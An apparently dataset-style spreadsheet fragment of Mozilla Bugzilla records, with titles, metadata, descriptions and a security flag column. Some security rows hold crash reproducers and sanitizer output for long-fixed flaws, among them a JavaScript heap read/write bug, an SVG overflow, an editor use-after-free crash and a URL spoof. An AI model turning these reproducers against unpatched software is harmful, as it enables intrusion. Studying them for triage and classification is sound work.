        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4812" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4812" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4812" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4812" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4812" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4812" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4812" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4812" t="inlineStr">
        <is>
          <t>[tryserver]</t>
        </is>
      </c>
      <c r="Q4812" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4812" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4812" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4812" t="n">
        <v>1</v>
      </c>
      <c r="U4812" t="n">
        <v>0</v>
      </c>
      <c r="V4812" t="n">
        <v>10</v>
      </c>
      <c r="W4812" t="inlineStr">
        <is>
          <t>This is getting handled fine in the creation of the packages and the uploading to tryserver-builds but the email generation in status/generators.py is messing up the build properties of got_revision and who.</t>
        </is>
      </c>
      <c r="X4812" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4813">
      <c r="A4813" t="n">
        <v>1306308</v>
      </c>
      <c r="B4813" t="inlineStr">
        <is>
          <t>2016-09-29 07:26:55 -0700</t>
        </is>
      </c>
      <c r="C4813" t="inlineStr">
        <is>
          <t>[One-off searches] Awesomebar results don't show the correct search engine when searching with search engine keywords</t>
        </is>
      </c>
      <c r="D4813" t="inlineStr">
        <is>
          <t>2018-07-13 04:26:43 -0700</t>
        </is>
      </c>
      <c r="E4813" t="n">
        <v>1</v>
      </c>
      <c r="F4813" t="n">
        <v>1</v>
      </c>
      <c r="G4813" t="n">
        <v>2</v>
      </c>
      <c r="H4813" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4813" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4813" t="inlineStr">
        <is>
          <t>Search</t>
        </is>
      </c>
      <c r="K4813" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4813" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4813" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4813" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4813" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4813" t="inlineStr">
        <is>
          <t>[fxsearch]</t>
        </is>
      </c>
      <c r="Q4813" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4813" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4813" t="inlineStr">
        <is>
          <t>Firefox 52</t>
        </is>
      </c>
      <c r="T4813" t="n">
        <v>1</v>
      </c>
      <c r="U4813" t="n">
        <v>0</v>
      </c>
      <c r="V4813" t="n">
        <v>17</v>
      </c>
      <c r="W4813" t="inlineStr">
        <is>
          <t>Created attachment 8796179
screenshot_of_the_issue.jpg
[Affected versions]:
Nightly 52.0a1 Build ID 20160928030201
[Affected platforms]:
All (Windows 10, Mac 10.12, Ubuntu 16.04)
[Steps to reproduce]:
1. Open Firefox with a new profile.
2. Go to about:preferences#search.
3. Add a keyword for one search engine(e.g for Bing add "bn" keyword).
4. In Awesomebar type the keyword from step 3 and a search term (e.g "bn mozilla").
5. Inspect the results from the dropdown.
[Expected result]:
 Results from Awesomebar should state that the search will be performed with "Bing" (e.g. "mozilla - Search with Bing").
[Actual result]
 Results from Awesomebar state that the search will be performed with Google even if the search is performed with Bing. Note that the Bing icon is present, just the text seems to be wrong.
[Regression Range]
Pushlog: https://hg.mozilla.org/integration/fx-team/pushloghtml?fromchange=46045ec8a4aa09a341b7209170089ade3c27c1a5&amp;tochange=555caa0082c342c60830261ecba4c4068122207e
Regressed by bug 1180944.</t>
        </is>
      </c>
      <c r="X4813" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4814">
      <c r="A4814" t="n">
        <v>1544871</v>
      </c>
      <c r="B4814" t="inlineStr">
        <is>
          <t>2019-04-16 10:13:29 -0700</t>
        </is>
      </c>
      <c r="C4814" t="inlineStr">
        <is>
          <t>[auth] Implement API to get temporary GCP credentials for GCS access</t>
        </is>
      </c>
      <c r="D4814" t="inlineStr">
        <is>
          <t>2019-05-16 12:03:05 -0700</t>
        </is>
      </c>
      <c r="E4814" t="n">
        <v>1</v>
      </c>
      <c r="F4814" t="n">
        <v>1</v>
      </c>
      <c r="G4814" t="n">
        <v>5</v>
      </c>
      <c r="H4814" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4814" t="inlineStr">
        <is>
          <t>Taskcluster</t>
        </is>
      </c>
      <c r="J4814" t="inlineStr">
        <is>
          <t>Services</t>
        </is>
      </c>
      <c r="K4814" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4814" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4814" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4814" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4814" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4814" t="inlineStr"/>
      <c r="Q4814" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4814" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4814" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4814" t="n">
        <v>1</v>
      </c>
      <c r="U4814" t="n">
        <v>0</v>
      </c>
      <c r="V4814" t="n">
        <v>2</v>
      </c>
      <c r="W4814" t="inlineStr">
        <is>
          <t>As we are moving to GCP, sccache will move from S3 to GCP. The way it works for S3 inside Taskcluster is to request temporary credentials for S3 from auth service. We want it to work the same way in GCP.</t>
        </is>
      </c>
      <c r="X4814" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4815">
      <c r="A4815" t="n">
        <v>855331</v>
      </c>
      <c r="B4815" t="inlineStr">
        <is>
          <t>2013-03-27 09:37:57 -0700</t>
        </is>
      </c>
      <c r="C4815" t="inlineStr">
        <is>
          <t>TransactionThreadPool doing sketchy things with mCompleteCallbacks array that can mutate</t>
        </is>
      </c>
      <c r="D4815" t="inlineStr">
        <is>
          <t>2014-05-05 18:12:22 -0700</t>
        </is>
      </c>
      <c r="E4815" t="n">
        <v>1</v>
      </c>
      <c r="F4815" t="n">
        <v>1</v>
      </c>
      <c r="G4815" t="n">
        <v>3</v>
      </c>
      <c r="H4815" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4815" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4815" t="inlineStr">
        <is>
          <t>Storage: IndexedDB</t>
        </is>
      </c>
      <c r="K4815" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4815" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4815" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4815" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4815" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4815" t="inlineStr">
        <is>
          <t>[regression from bug 767944?][don't uplift yet, see comment 23][adv-main23+]</t>
        </is>
      </c>
      <c r="Q4815" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4815" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4815" t="inlineStr">
        <is>
          <t>mozilla23</t>
        </is>
      </c>
      <c r="T4815" t="n">
        <v>1</v>
      </c>
      <c r="U4815" t="n">
        <v>0</v>
      </c>
      <c r="V4815" t="n">
        <v>37</v>
      </c>
      <c r="W4815" t="inlineStr">
        <is>
          <t>See https://tbpl.mozilla.org/php/getParsedLog.php?id=21144311&amp;tree=Mozilla-Inbound
TransactionThreadPool::FinishTransaction() calls MaybeFireCallback with a DatabasesCompleteCallback&amp; reference that comes out of mCompleteCallbacks. It then calls Run() on the callback, which could do something like call WaitForAllDatabasesToComplete which appends an element to mCompleteCallbacks. If that causes reallocation then the DatabasesCompleteCallback&amp; on our stack is now garbage.
Somehow the log says we're jumping to HasTransactionsForDatabase (line 472), but I can't see how that is happening. Maybe we're calling a virtual Run() on one of our callback pointers that is now garbage?</t>
        </is>
      </c>
      <c r="X4815" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4816">
      <c r="A4816" t="n">
        <v>711653</v>
      </c>
      <c r="B4816" t="inlineStr">
        <is>
          <t>2011-12-16 16:00:35 -0800</t>
        </is>
      </c>
      <c r="C4816" t="inlineStr">
        <is>
          <t>SVGFilter out of bounds read (Address Sanitizer)</t>
        </is>
      </c>
      <c r="D4816" t="inlineStr">
        <is>
          <t>2016-02-21 04:42:11 -0800</t>
        </is>
      </c>
      <c r="E4816" t="n">
        <v>1</v>
      </c>
      <c r="F4816" t="n">
        <v>1</v>
      </c>
      <c r="G4816" t="n">
        <v>3</v>
      </c>
      <c r="H4816" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4816" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4816" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K4816" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4816" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4816" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4816" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4816" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4816" t="inlineStr">
        <is>
          <t>[sg:moderate][asan][qa!]</t>
        </is>
      </c>
      <c r="Q4816" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4816" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4816" t="inlineStr">
        <is>
          <t>mozilla13</t>
        </is>
      </c>
      <c r="T4816" t="n">
        <v>1</v>
      </c>
      <c r="U4816" t="n">
        <v>0</v>
      </c>
      <c r="V4816" t="n">
        <v>52</v>
      </c>
      <c r="W4816" t="inlineStr">
        <is>
          <t>Created attachment 582424
reduced_heap_firefox.svg
User Agent: Mozilla/5.0 (Ubuntu; X11; Linux x86_64; rv:10.0a2) Gecko/20111214 Firefox/10.0a2
Build ID: 20111214081512
Steps to reproduce:
OS: Ubuntu 11.04 x64 
Version: Nightly - 11.0a1 (2011-12-17)
Open one of the attached svg-files trough html with the following content 
example:
&lt;img src="reduce_heap_firefox.svg" width=50 height=50&gt;
Actual results:
With the reduced case Address Sanitizer reports:
==7843== ERROR: AddressSanitizer heap-buffer-overflow on address 0x7f52ae049193 at pc 0x7f52d0e832e3 bp 0x7fff11229800 sp 0x7fff112297f8
READ of size 1 at 0x7f52ae049193 thread T0
    #0 0x7f52d0e832e3 (/home/attekett/src/objdir-ff-asan/toolkit/library/libxul.so+0x1d392e3)
0x7f52ae049193 is located 3 bytes to the right of 16-byte region [0x7f52ae049180,0x7f52ae049190)
allocated by thread T0 here:
    #0 0x40b0de (/home/attekett/src/objdir-ff-asan/dist/bin/firefox-bin+0x40b0de)
    #1 0x7f52d1a970ac (/home/attekett/src/objdir-ff-asan/toolkit/library/libxul.so+0x294d0ac)
    #2 0x7f52d1a96d01 (/home/attekett/src/objdir-ff-asan/toolkit/library/libxul.so+0x294cd01)
==7843== ABORTING
Stats: 48M malloced (74M for red zones) by 230316 calls
Stats: 3M realloced by 15011 calls
Stats: 26M freed by 123878 calls
Stats: 0M really freed by 0 calls
Stats: 152M (38929 full pages) mmaped in 38 calls
  mmaps   by size class: 8:212979; 9:24573; 10:8190; 11:6141; 12:2048; 13:1024; 14:512; 15:256; 16:192; 17:32; 18:48; 19:8; 20:4; 
  mallocs by size class: 8:193922; 9:20891; 10:7322; 11:5292; 12:1426; 13:631; 14:497; 15:133; 16:131; 17:20; 18:45; 19:5; 20:1; 
  frees   by size class: 8:101631; 9:12645; 10:4978; 11:2738; 12:874; 13:472; 14:346; 15:102; 16:66; 17:15; 18:8; 19:3; 
  rfrees  by size class: 
Stats: malloc large: 71 small slow: 893
Shadow byte and word:
  0x1fea55c09232: fb
  0x1fea55c09230: 00 00 fb fb fb fb fb fb
More shadow bytes:
  0x1fea55c09210: 00 00 00 00 00 00 00 00
  0x1fea55c09218: 00 fb fb fb fb fb fb fb
  0x1fea55c09220: fa fa fa fa fa fa fa fa
  0x1fea55c09228: fa fa fa fa fa fa fa fa
=&gt;0x1fea55c09230: 00 00 fb fb fb fb fb fb
  0x1fea55c09238: fb fb fb fb fb fb fb fb
  0x1fea55c09240: fa fa fa fa fa fa fa fa
  0x1fea55c09248: fa fa fa fa fa fa fa fa
  0x1fea55c09250: 00 fb fb fb fb fb fb fb</t>
        </is>
      </c>
      <c r="X4816" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4817">
      <c r="A4817" t="n">
        <v>476049</v>
      </c>
      <c r="B4817" t="inlineStr">
        <is>
          <t>2009-01-29 15:09:36 -0800</t>
        </is>
      </c>
      <c r="C4817" t="inlineStr">
        <is>
          <t>JSOP_DEFVAR enables gvar optimization for non-permanent properties</t>
        </is>
      </c>
      <c r="D4817" t="inlineStr">
        <is>
          <t>2009-08-07 16:50:15 -0700</t>
        </is>
      </c>
      <c r="E4817" t="n">
        <v>1</v>
      </c>
      <c r="F4817" t="n">
        <v>1</v>
      </c>
      <c r="G4817" t="n">
        <v>3</v>
      </c>
      <c r="H4817" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4817" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4817" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4817" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4817" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4817" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4817" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4817" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4817" t="inlineStr">
        <is>
          <t>[sg:critical] fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q4817" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4817" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4817" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4817" t="n">
        <v>1</v>
      </c>
      <c r="U4817" t="n">
        <v>0</v>
      </c>
      <c r="V4817" t="n">
        <v>38</v>
      </c>
      <c r="W4817" t="inlineStr">
        <is>
          <t>gvar optimization in the js_Interpret can only be applied to permanent properties as it assumes that properties's slot stays the same. But JSOP_DEFVAR fails to enforce this when it defines a variable that already exists. JSOP_DEFVAR will enable the optimization even if such existing property does not have the JSPROP_PERMANENT attribute and can be deleted. The following example demonstrates the problem:
@watson~/m/tm/js/src&gt; cat ~/s/y.js
for (var i = 0; i != 1000; ++i)
    this["a"+i] = 0;
eval("var x");
for (var i = 0; i != 1000; ++i)
    delete this["a"+i];
@watson~/m/tm/js/src&gt; cat ~/s/x.js
var x;
eval("delete x;");
x={};
@watson~/m/tm/js/src&gt; ~/build/js64.tm.dbg/js -f ~/s/y.js -f ~/s/x.js
Assertion failure: slot &lt; (obj)-&gt;map-&gt;freeslot, at /home/igor/m/tm/js/src/jsinterp.cpp:5623
Aborted
Note that the example uses 2 file to ensure that the eval that define variable in the first file will be executed before JSOP_DEFVAR for the second. In a browser this can be modeled with 2 &lt;script&gt; tags.
The bug is critical as it allows to read and write arbitrary data passed heap-allocated array.</t>
        </is>
      </c>
      <c r="X4817" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4818">
      <c r="A4818" t="n">
        <v>432114</v>
      </c>
      <c r="B4818" t="inlineStr">
        <is>
          <t>2008-05-04 07:06:54 -0700</t>
        </is>
      </c>
      <c r="C4818" t="inlineStr">
        <is>
          <t>Crash [@ PL_DHashTableOperate][@ nsEditor::EndUpdateViewBatch] with DOMNodeInserted event listener removing window and frameset contenteditable</t>
        </is>
      </c>
      <c r="D4818" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:47 -0700</t>
        </is>
      </c>
      <c r="E4818" t="n">
        <v>1</v>
      </c>
      <c r="F4818" t="n">
        <v>1</v>
      </c>
      <c r="G4818" t="n">
        <v>3</v>
      </c>
      <c r="H4818" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4818" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4818" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K4818" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4818" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4818" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N4818" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4818" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4818" t="inlineStr">
        <is>
          <t>[sg:critical?] post 1.8-branch</t>
        </is>
      </c>
      <c r="Q4818" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4818" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4818" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4818" t="n">
        <v>1</v>
      </c>
      <c r="U4818" t="n">
        <v>0</v>
      </c>
      <c r="V4818" t="n">
        <v>41</v>
      </c>
      <c r="W4818" t="inlineStr">
        <is>
          <t>Created attachment 319272
testcase
See testcase, which crashes current trunk build.
This regressed between 2008-04-23 and 2008-04-24:
http://bonsai.mozilla.org/cvsquery.cgi?treeid=default&amp;module=all&amp;branch=HEAD&amp;branchtype=match&amp;dir=&amp;file=&amp;filetype=match&amp;who=&amp;whotype=match&amp;sortby=Date&amp;hours=2&amp;date=explicit&amp;mindate=2008-04-23+04&amp;maxdate=2008-04-24+09&amp;cvsroot=%2Fcvsroot
I think a regression of bug 386782.
The data url of the iframe consists of this:
&lt;script&gt;
window.addEventListener('DOMNodeInserted', function() {window.frameElement.parentNode.removeChild(window.frameElement);}, true);
&lt;/script&gt;
&lt;frameset contenteditable="true"&gt;
Useful stack of breakpad (I also get a lot of useless stacks):
http://crash-stats.mozilla.com/report/index/a30693b8-19df-11dd-a4f1-001a4bd46e84?p=1
0  	xul.dll  	PL_DHashTableOperate  	 pldhash.c:588
1 	xul.dll 	nsTHashtable&lt;nsBaseHashtableET&lt;nsStringHashKey, nsCOMPtr&lt;nsIDOMStorage&gt; &gt; &gt;::GetEntry 	nsTHashtable.h:164
2 	xul.dll 	nsClassHashtable&lt;nsUint32HashKey, nsCOMArray&lt;nsXULTemplateResultRDF&gt; &gt;::Get 	nsClassHashtable.h:101
3 	xul.dll 	nsCommandManager::CommandStatusChanged 	mozilla/embedding/components/commandhandler/src/nsCommandManager.cpp:127
4 	xul.dll 	nsComposerCommandsUpdater::UpdateCommandGroup 	mozilla/editor/composer/src/nsComposerCommandsUpdater.cpp:347
5 	xul.dll 	nsComposerCommandsUpdater::UpdateDirtyState 	mozilla/editor/composer/src/nsComposerCommandsUpdater.cpp:291
6 	xul.dll 	nsComposerCommandsUpdater::NotifyDocumentStateChanged 	mozilla/editor/composer/src/nsComposerCommandsUpdater.cpp:107
7 	xul.dll 	xul.dll@0x24f93c 	
8 	xul.dll 	nsEditor::IncrementModificationCount 	mozilla/editor/libeditor/base/nsEditor.cpp:3877
9 	xul.dll 	nsEditor::DoAfterDoTransaction 	mozilla/editor/libeditor/base/nsEditor.cpp:4638
10 	xul.dll 	nsEditor::DoTransaction 	mozilla/editor/libeditor/base/nsEditor.cpp:690
11 	xul.dll 	nsEditor::InsertNode 	mozilla/editor/libeditor/base/nsEditor.cpp:1393
12 	xul.dll 	nsTextEditRules::CreateBogusNodeIfNeeded 	mozilla/editor/libeditor/text/nsTextEditRules.cpp:1332
13 	xul.dll 	nsTextEditRules::Init 	mozilla/editor/libeditor/text/nsTextEditRules.cpp:141
14 	xul.dll 	nsHTMLEditRules::Init 	mozilla/editor/libeditor/html/nsHTMLEditRules.cpp:252
15 	xul.dll 	nsHTMLEditor::InitRules 	mozilla/editor/libeditor/html/nsHTMLEditor.cpp:437
16 	xul.dll 	nsPlaintextEditor::EndEditorInit 	mozilla/editor/libeditor/text/nsPlaintextEditor.cpp:180
17 	xul.dll 	nsAutoEditInitRulesTrigger::~nsAutoEditInitRulesTrigger 	mozilla/editor/libeditor/text/nsTextEditUtils.cpp:134
18 	xul.dll 	nsHTMLEditor::Init 	mozilla/editor/libeditor/html/nsHTMLEditor.cpp:344
19 	xul.dll 	nsEditingSession::SetupEditorOnWindow 	mozilla/editor/composer/src/nsEditingSession.cpp:492
20 	xul.dll 	nsEditingSession::MakeWindowEditable 	mozilla/editor/composer/src/nsEditingSession.cpp:208</t>
        </is>
      </c>
      <c r="X4818" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4819">
      <c r="A4819" t="n">
        <v>43679</v>
      </c>
      <c r="B4819" t="inlineStr">
        <is>
          <t>2000-06-23 15:55:32 -0700</t>
        </is>
      </c>
      <c r="C4819" t="inlineStr">
        <is>
          <t>lose sender when scrolling in the addressing pane</t>
        </is>
      </c>
      <c r="D4819" t="inlineStr">
        <is>
          <t>2011-08-05 21:15:16 -0700</t>
        </is>
      </c>
      <c r="E4819" t="n">
        <v>1</v>
      </c>
      <c r="F4819" t="n">
        <v>1</v>
      </c>
      <c r="G4819" t="n">
        <v>3</v>
      </c>
      <c r="H4819" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4819" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J4819" t="inlineStr">
        <is>
          <t>Composition</t>
        </is>
      </c>
      <c r="K4819" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4819" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4819" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4819" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4819" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4819" t="inlineStr">
        <is>
          <t>[dogfood+] depend on 43575</t>
        </is>
      </c>
      <c r="Q4819" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4819" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4819" t="inlineStr">
        <is>
          <t>M17</t>
        </is>
      </c>
      <c r="T4819" t="n">
        <v>1</v>
      </c>
      <c r="U4819" t="n">
        <v>0</v>
      </c>
      <c r="V4819" t="n">
        <v>24</v>
      </c>
      <c r="W4819" t="inlineStr">
        <is>
          <t>From Bugzilla Helper:
User-Agent: Mozilla/4.73 [en]C-NSCP  (Win98; U)
BuildID:    2000-06-23
lose sender when scrolling in the addressing  pane 
Reproducible: Always
Steps to Reproduce:
1.launch messanger 
2.click new meeasge
3.type a name in the to field then, press enter type a second name in the to 
field, then press enter 
4. scroll up and down with the scroll bar
Actual Results:  the first name is missing and the massage does not get sent to 
that person when sending
Expected Results:  you should see both names 
bug logged by: Luis Rincon</t>
        </is>
      </c>
      <c r="X4819" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4820">
      <c r="A4820" t="n">
        <v>802026</v>
      </c>
      <c r="B4820" t="inlineStr">
        <is>
          <t>2012-10-16 00:12:54 -0700</t>
        </is>
      </c>
      <c r="C4820" t="inlineStr">
        <is>
          <t>URL spoofing with credentials info of URL &amp; 204</t>
        </is>
      </c>
      <c r="D4820" t="inlineStr">
        <is>
          <t>2024-05-30 07:34:02 -0700</t>
        </is>
      </c>
      <c r="E4820" t="n">
        <v>1</v>
      </c>
      <c r="F4820" t="n">
        <v>1</v>
      </c>
      <c r="G4820" t="n">
        <v>2</v>
      </c>
      <c r="H4820" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4820" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4820" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K4820" t="inlineStr">
        <is>
          <t>16 Branch</t>
        </is>
      </c>
      <c r="L4820" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4820" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4820" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4820" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4820" t="inlineStr">
        <is>
          <t>[adv-main18+][adv-esr17+][adv-esr10+]</t>
        </is>
      </c>
      <c r="Q4820" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4820" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4820" t="inlineStr">
        <is>
          <t>Firefox 20</t>
        </is>
      </c>
      <c r="T4820" t="n">
        <v>1</v>
      </c>
      <c r="U4820" t="n">
        <v>0</v>
      </c>
      <c r="V4820" t="n">
        <v>31</v>
      </c>
      <c r="W4820" t="inlineStr">
        <is>
          <t>Created attachment 671741
spoof_credentials_and_204.html
User Agent: Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20100101 Firefox/16.0
Build ID: 20121010144125
Steps to reproduce:
1. Go to attachment file and click "go" button.
2. Address bar points "google.com". But in fact, it is not "google.com".
Expected results:
Firefox should display URL correctly.</t>
        </is>
      </c>
      <c r="X4820" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4821">
      <c r="A4821" t="n">
        <v>1511022</v>
      </c>
      <c r="B4821" t="inlineStr">
        <is>
          <t>2018-11-29 06:25:49 -0800</t>
        </is>
      </c>
      <c r="C4821" t="inlineStr">
        <is>
          <t>verbose logging for signature generation</t>
        </is>
      </c>
      <c r="D4821" t="inlineStr">
        <is>
          <t>2018-12-19 14:17:41 -0800</t>
        </is>
      </c>
      <c r="E4821" t="n">
        <v>1</v>
      </c>
      <c r="F4821" t="n">
        <v>1</v>
      </c>
      <c r="G4821" t="n">
        <v>4</v>
      </c>
      <c r="H4821" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4821" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J4821" t="inlineStr">
        <is>
          <t>Signature</t>
        </is>
      </c>
      <c r="K4821" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4821" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4821" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4821" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4821" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4821" t="inlineStr"/>
      <c r="Q4821" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4821" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4821" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4821" t="n">
        <v>1</v>
      </c>
      <c r="U4821" t="n">
        <v>0</v>
      </c>
      <c r="V4821" t="n">
        <v>4</v>
      </c>
      <c r="W4821" t="inlineStr">
        <is>
          <t>Signature generation is complicated. In cases where it produces a signature that's unhelpful, it really helps to know the minutia of what happened during signature generation. Was there a sentinel? Was it looking at the right thread? Which frames did it skip? And so on.
This bug covers reworking signature generation so that it logs what it did to build a signature and spits out that information in "socorro-cmd signature" in some --verbose mode.</t>
        </is>
      </c>
      <c r="X4821" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4822">
      <c r="A4822" t="n">
        <v>1417661</v>
      </c>
      <c r="B4822" t="inlineStr">
        <is>
          <t>2017-11-15 13:30:59 -0800</t>
        </is>
      </c>
      <c r="C4822" t="inlineStr">
        <is>
          <t>heap-buffer-overflow in nsFirstLetterFrame::CreateContinuationForFloatingParent</t>
        </is>
      </c>
      <c r="D4822" t="inlineStr">
        <is>
          <t>2024-05-30 09:38:26 -0700</t>
        </is>
      </c>
      <c r="E4822" t="n">
        <v>1</v>
      </c>
      <c r="F4822" t="n">
        <v>1</v>
      </c>
      <c r="G4822" t="n">
        <v>3</v>
      </c>
      <c r="H4822" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4822" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4822" t="inlineStr">
        <is>
          <t>Layout: Floats</t>
        </is>
      </c>
